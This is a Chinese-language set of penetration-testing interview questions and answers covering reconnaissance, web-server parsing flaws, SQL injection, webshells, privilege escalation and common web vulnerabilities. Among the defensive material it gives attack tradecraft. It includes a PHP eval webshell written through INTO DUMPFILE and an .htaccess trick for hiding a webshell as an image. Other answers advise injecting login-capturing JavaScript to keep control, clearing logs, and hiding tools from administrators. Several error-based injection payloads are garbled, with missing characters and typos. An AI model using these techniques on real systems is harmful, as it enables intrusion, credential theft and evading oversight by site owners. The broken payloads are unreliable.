滲透面試題

本文章轉載自阿里安全中心，轉載目的在於傳遞更多信息。如涉及作品內容、版權和其它問題，請聯繫我，我將在第一時間刪除內容！

1.拿到一個待檢測的站，你覺得應該先做什麼？

    1)信息收集
        1，獲取域名的whois信息,獲取註冊者郵箱姓名電話等。
        2，查詢服務器旁站以及子域名站點，因爲主站一般比較難，所以先看看旁站有沒有通用性的cms或者其他漏洞。
        3，查看服務器操作系統版本，web中間件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞
        4，查看IP，進行IP地址端口掃描，對響應的端口進行漏洞探測，比如 rsync,心臟出血，mysql,ftp,ssh弱口令等。
        5，掃描網站目錄結構，看看是否可以遍歷目錄，或者敏感文件泄漏，比如php探針
        6，google hack 進一步探測網站的信息，後臺，敏感文件
    2）漏洞掃描
        開始檢測漏洞，如XSS,XSRF,sql注入，代碼執行，命令執行，越權訪問，目錄讀取，任意文件讀取，下載，文件包含，
        遠程命令執行，弱口令，上傳，編輯器漏洞，暴力破解等
    3）漏洞利用
        利用以上的方式拿到webshell，或者其他權限
    4）權限提升
        提權服務器，比如windows下mysql的udf提權，serv-u提權，windows低版本的漏洞，如iis6,pr,巴西烤肉，linux髒牛漏洞，linux內核版本漏洞提權，linux下的mysql system提權以及oracle低權限提權
    5) 日誌清理
    6）總結報告及修復方案

 

2.判斷出網站的CMS對滲透有什麼意義？

    查找網上已曝光的程序漏洞。

    如果開源，還能下載相對應的源碼進行代碼審計。
 

3.一個成熟並且相對安全的CMS，滲透時掃目錄的意義？

    敏感文件、二級目錄掃描

    站長的誤操作比如：網站備份的壓縮文件、說明.txt、二級目錄可能存放着其他站點
 

4.常見的網站服務器容器。

    IIS、Apache、nginx、Lighttpd、Tomcat
 

5.mysql注入點，用工具對目標站直接寫入一句話，需要哪些條件？

    root權限以及網站的絕對路徑。
 

6.目前已知哪些版本的容器有解析漏洞，具體舉例。

    IIS 6.0
    /xx.asp/xx.jpg "xx.asp"是文件夾名

    IIS 7.0/7.5
    默認Fast-CGI開啓，直接在url中圖片地址後面輸入/1.php，會把正常圖片當成php解析

    Nginx
    版本小於等於0.8.37，利用方法和IIS 7.0/7.5一樣，Fast-CGI關閉情況下也可利用。
    空字節代碼 xxx.jpg.php

    Apache
    上傳的文件命名爲：test.php.x1.x2.x3，Apache是從右往左判斷後綴

    lighttpd
    xx.jpg/xx.php，不全,請小夥伴們在評論處不吝補充，謝謝！
 

7.如何手工快速判斷目標站是windows還是linux服務器？

    linux大小寫敏感,windows大小寫不敏感。
 

8.爲何一個mysql數據庫的站，只有一個80端口開放？

    更改了端口，沒有掃描出來。

    站庫分離。

    3306端口不對外開放
 

9、3389無法連接的幾種情況

    沒開放3389 端口

    端口被修改

    防護攔截

    處於內網(需進行端口轉發)
 

10.如何突破注入時字符被轉義？

    寬字符注入

    hex編碼繞過
 

11.在某後臺新聞編輯界面看到編輯器，應該先做什麼？

    查看編輯器的名稱版本,然後搜索公開的漏洞。
 

12.拿到一個webshell發現網站根目錄下有.htaccess文件，我們能做什麼？

    能做的事情很多，用隱藏網馬來舉例子：
    插入
    <FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>
    .jpg文件會被解析成.php文件。

    具體其他的事情，不好詳說，建議大家自己去搜索語句來玩玩。
 

13.注入漏洞只能查賬號密碼？

    只要權限廣，拖庫脫到老。
 

14.安全狗會追蹤變量，從而發現出是一句話木馬嗎？

    是根據特徵碼，所以很好繞過了，只要思路寬，繞狗繞到歡，但這應該不會是一成不變的。
 

15.access 掃出後綴爲asp的數據庫文件，訪問亂碼，如何實現到本地利用？

    迅雷下載，直接改後綴爲.mdb。
 

16.提權時選擇可讀寫目錄，爲何儘量不用帶空格的目錄？

    因爲exp執行多半需要空格界定參數
 

17.某服務器有站點A,B 爲何在A的後臺添加test用戶，訪問B的後臺。發現也添加上了test用戶？

    同數據庫。
 

18.注入時可以不使用and 或or 或xor，直接order by 開始注入嗎？

    and/or/xor，前面的1=1、1=2步驟只是爲了判斷是否爲注入點，如果已經確定是注入點那就可以省那步驟去。
 

19:某個防注入系統，在注入時會提示：

系統檢測到你有非法注入的行爲。
已記錄您的ip xx.xx.xx.xx
時間:2016:01-23
提交頁面:test.asp?id=15
提交內容:and 1=1

20、如何利用這個防注入系統拿shell？

在URL裏面直接提交一句話，這樣網站就把你的一句話也記錄進數據庫文件了 這個時候可以嘗試尋找網站的配置文件 直接上菜刀鏈接。具體文章參見：http://ytxiao.lofter.com/post/40583a_ab36540。
 

21.上傳大馬後訪問亂碼時，有哪些解決辦法？

    瀏覽器中改編碼。
 

22.審查上傳點的元素有什麼意義？

    有些站點的上傳文件類型的限制是在前端實現的，這時只要增加上傳類型就能突破限制了。
 

23.目標站禁止註冊用戶，找回密碼處隨便輸入用戶名提示：“此用戶不存在”，你覺得這裏怎樣利用？

    先爆破用戶名，再利用被爆破出來的用戶名爆破密碼。

    其實有些站點，在登陸處也會這樣提示

    所有和數據庫有交互的地方都有可能有注入。
 

24.目標站發現某txt的下載地址爲http://www.test.com/down/down.php?file=/upwdown/1.txt，你有什麼思路？

    這就是傳說中的下載漏洞！在file=後面嘗試輸入index.php下載他的首頁文件，然後在首頁文件裏繼續查找其他網站的配置文件，可以找出網站的數據庫密碼和數據庫的地址。
 

25.甲給你一個目標站，並且告訴你根目錄下存在/abc/目錄，並且此目錄下存在編輯器和admin目錄。請問你的想法是？

    直接在網站二級目錄/abc/下掃描敏感文件及目錄。
 

26.在有shell的情況下，如何使用xss實現對目標站的長久控制？

    後臺登錄處加一段記錄登錄賬號密碼的js，並且判斷是否登錄成功，如果登錄成功，就把賬號密碼記錄到一個生僻的路徑的文件中或者直接發到自己的網站文件中。(此方法適合有價值並且需要深入控制權限的網絡)。

    在登錄後纔可以訪問的文件中插入XSS腳本。
 

27.後臺修改管理員密碼處，原密碼顯示爲*。你覺得該怎樣實現讀出這個用戶的密碼？

    審查元素 把密碼處的password屬性改成text就明文顯示了
 

28.目標站無防護，上傳圖片可以正常訪問，上傳腳本格式訪問則403.什麼原因？

    原因很多，有可能web服務器配置把上傳目錄寫死了不執行相應腳本，嘗試改後綴名繞過
 

29.審查元素得知網站所使用的防護軟件，你覺得怎樣做到的？

    在敏感操作被攔截，通過界面信息無法具體判斷是什麼防護的時候，F12看HTML體部 比如護衛神就可以在名稱那看到<hws>內容<hws>。
 

30.在win2003服務器中建立一個 .zhongzi文件夾用意何爲？

    隱藏文件夾，爲了不讓管理員發現你傳上去的工具。
 

31、sql注入有以下兩個測試選項，選一個並且闡述不選另一個的理由：

A. demo.jsp?id=2+1       B. demo.jsp?id=2-1
選B，在 URL 編碼中 + 代表空格，可能會造成混淆
 

32、以下鏈接存在 sql 注入漏洞，對於這個變形注入，你有什麼思路？

demo.do?DATA=AjAxNg==
DATA有可能經過了 base64 編碼再傳入服務器，所以我們也要對參數進行 base64 編碼才能正確完成測試
 

33、發現 demo.jsp?uid=110 注入點，你有哪幾種思路獲取 webshell，哪種是優選？

有寫入權限的，構造聯合查詢語句使用using INTO OUTFILE，可以將查詢的輸出重定向到系統的文件中，這樣去寫入 WebShell
使用 sqlmap –os-shell 原理和上面一種相同，來直接獲得一個 Shell，這樣效率更高
通過構造聯合查詢語句得到網站管理員的賬戶和密碼，然後掃後臺登錄後臺，再在後臺通過改包上傳等方法上傳 Shell
 

34、CSRF 和 XSS 和 XXE 有什麼區別，以及修復方式？

XSS是跨站腳本攻擊，用戶提交的數據中可以構造代碼來執行，從而實現竊取用戶信息等攻擊。修復方式：對字符實體進行轉義、使用HTTP Only來禁止JavaScript讀取Cookie值、輸入時校驗、瀏覽器與Web應用端採用相同的字符編碼。

CSRF是跨站請求僞造攻擊，XSS是實現CSRF的諸多手段中的一種，是由於沒有在關鍵操作執行時進行是否由用戶自願發起的確認。修復方式：篩選出需要防範CSRF的頁面然後嵌入Token、再次輸入密碼、檢驗Referer
XXE是XML外部實體注入攻擊，XML中可以通過調用實體來請求本地或者遠程內容，和遠程文件保護類似，會引發相關安全問題，例如敏感文件讀取。修復方式：XML解析庫在調用時嚴格禁止對外部實體的解析。
 

35、CSRF、SSRF和重放攻擊有什麼區別？

CSRF是跨站請求僞造攻擊，由客戶端發起
SSRF是服務器端請求僞造，由服務器發起
重放攻擊是將截獲的數據包進行重放，達到身份認證等目的
 

36、說出至少三種業務邏輯漏洞，以及修復方式？

密碼找回漏洞中存在

1）密碼允許暴力破解、

2）存在通用型找回憑證、

3）可以跳過驗證步驟、

4）找回憑證可以攔包獲取

等方式來通過廠商提供的密碼找回功能來得到密碼。
身份認證漏洞中最常見的是

1）會話固定攻擊

2） Cookie 仿冒

只要得到 Session 或 Cookie 即可僞造用戶身份。
驗證碼漏洞中存在

1）驗證碼允許暴力破解

2）驗證碼可以通過 Javascript 或者改包的方法來進行繞過
 

37、圈出下面會話中可能存在問題的項，並標註可能會存在的問題？

get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world”
HTTP/1.1Host:***.com:82User-Agent:Mozilla/
5.0 Firefox/40Accept:text/css,/;q=0.1
Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer:http://*******.com/eciop/orderForCC/
cgtListForCC.htm?zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI-NX01VPUF46W;
status=True
Connection:keep-alive
 

 

38、給你一個網站你是如何來滲透測試的?
    在獲取書面授權的前提下。
    
 

39、sqlmap，怎麼對一個注入點注入？
    1）如果是get型號，直接，sqlmap -u "諸如點網址".
    2) 如果是post型諸如點，可以sqlmap -u "注入點網址” --data="post的參數"
    3）如果是cookie，X-Forwarded-For等，可以訪問的時候，用burpsuite抓包，注入處用號替換，放到文件裏，然後sqlmap -r "文件地址"
 

40、nmap，掃描的幾種方式
TCP connect

TCP SYN scanning

TCP FIN scanning

TCP NULL, FIN, and Xmas scans

TCP ACK scan

TCP Window scan

TCP Maimon scan

IP protocol scan

UDP ICMP port unreachable scanning

UDP connect

41、sql注入的幾種類型？
    1）報錯注入
    2）bool型注入
    3）延時注入
    4）寬字節注入
42、報錯注入的函數有哪些？ 10個
    1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------
    2）通過floor報錯 向下取整
    3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
    4）.geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));
    5）.multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));
    6）.polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));
    7）.multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));
    8）.linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));
    9）.multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));
    10）.exp()select from test where id=1 and exp(~(select * from(select user())a));
 

43、延時注入如何來判斷？
    if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
 

44、盲注和延時注入的共同點？
    都是一個字符一個字符的判斷
 

45、如何拿一個網站的webshell？
    上傳，後臺編輯模板，sql注入寫文件，命令執行，代碼執行，
    一些已經爆出的cms漏洞，比如dedecms後臺可以直接建立腳本文件，wordpress上傳插件包含腳本文件zip壓縮包等
 

46、sql注入寫文件都有哪些函數？
    select '一句話' into outfile '路徑'
    select '一句話' into dumpfile '路徑'
    select '<?php eval($_POST[1]) ?>' into dumpfile  'd:\wwwroot\baidu.com\nvhack.php';

47、如何防止CSRF?
    1,驗證referer
    2，驗證token
    詳細：http://cnodejs.org/topic/5533dd6e9138f09b629674fd
 

48、owasp 漏洞都有哪些？
    1、SQL注入防護方法：
    2、失效的身份認證和會話管理
    3、跨站腳本攻擊XSS
    4、直接引用不安全的對象
    5、安全配置錯誤
    6、敏感信息泄露
    7、缺少功能級的訪問控制
    8、跨站請求僞造CSRF
    9、使用含有已知漏洞的組件
    10、未驗證的重定向和轉發
 

49、SQL注入防護方法？
    1、使用安全的API
    2、對輸入的特殊字符進行Escape轉義處理
    3、使用白名單來規範化輸入驗證方法
    4、對客戶端輸入進行控制，不允許輸入SQL注入相關的特殊字符
    5、服務器端在提交數據庫進行SQL查詢之前，對特殊字符進行過濾、轉義、替換、刪除。

50、代碼執行，文件讀取，命令執行的函數都有哪些？

1）代碼執行：

eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

2）文件讀取：

file_get_contents(),highlight_file(),fopen(),read 

file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等
3)命令執行：

system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

 

51、img標籤除了onerror屬性外，還有其他獲取管理員路徑的辦法嗎？
    src指定一個遠程的腳本文件，獲取referer
 

52、img標籤除了onerror屬性外，並且src屬性的後綴名，必須以.jpg結尾，怎麼獲取管理員路徑。

1）遠程服務器修改apache配置文件，配置.jpg文件以php方式來解析
    AddType application/x-httpd-php .jpg
    <img src=http://xss.tv/1.jpg&gt; 會以php方式來解析